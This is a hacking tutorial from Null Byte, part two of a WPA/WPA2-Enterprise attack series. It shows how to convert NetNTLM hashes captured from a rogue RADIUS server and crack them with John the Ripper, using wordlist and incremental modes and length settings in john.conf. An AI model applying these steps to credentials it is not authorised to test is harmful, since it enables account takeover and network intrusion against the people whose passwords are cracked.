Header Banner
Null Byte Logo
Null Byte
WonderHowTo Gadget Hacks Next Reality Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker
how to

How to Hack WPA/WPA2-Enterprise Part 2

Oct 15, 2015 06:13 PM
Text collage featuring numbers and words related to passwords.

In the second part of this tutorial, we are going to crack the hashes that we've captured previously. I'm going to explain how to do it with the powerful John the Ripper. It comes with Kali by default, so no need to install!

Using John the Ripper

If you don't know nothing about this tool, you can check this Wikipedia article.

First, we have to put the password hashes in a friendly format for John. To do so, we will use a simple script that puts our freeradius-credsXXXXX.txt file in John format, you can download it here.

Visit the previous link, copy the script text to your clipboard and open a terminal.

Type:

nano radiustojohn.py

Paste the text from your clipboard and hit Control + O to save the changes, then Control + X to exit. Change the permissions to the file by typing:

chmod +x radiustojohn.py

At this point execute the script with the freeradius-credsXXXXXXX.txt file as parameter:

./radiustojohn.py <path to the freeradius-creds file>

Now we've generated a freeradius.john file that John can understand. Type:

john --format=netntlm freeradius.john

How to Hack WPA/WPA2-Enterprise Part 2

At any time you can hit any key to see the status. As you can see, in about 3 seconds we've guessed 12 passwords. The weaker the password, the faster we crack it. Stronger passwords can take years to be cracked, of course you can use a custom wordlist:

john --format=netntlm --wordlist=<path to your dictionary file> freeradius.john

If you know something about the password, for example the length, you can modify the John's configuration file in order to try only passwords of that length. The configuration file is located in /etc/john/john.conf, let's make a backup of that file:

cd /etc/john/

cp john.conf john.conf.old

Now that we've made a backup of the original file, let's change it.

leafpad john.conf

Code snippet showing configuration options and settings for a data processing task.

At this point of the file, change the MinLen and the MaxLen for the length of the password. Imagine that you know the password's length is exactly 8, then you must put 8 in MinLen and 8 in MaxLen. Save the changes and run John:

john --format=netntlm --incremental=All freeradius.john

John also supports OpenCL to work with your GPU, which can crack so much faster.

That's all, I hope you've enjoyed! Ask any question!

You already know how to use your phone. With Gadget Hacks' newsletter, we'll show you how to master it. Each week, we explore features, hidden tools, and advanced settings that give you more control over iOS and Android than most users even know exists.

Sign up for Gadget Hacks Weekly and start unlocking your phone's full potential.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!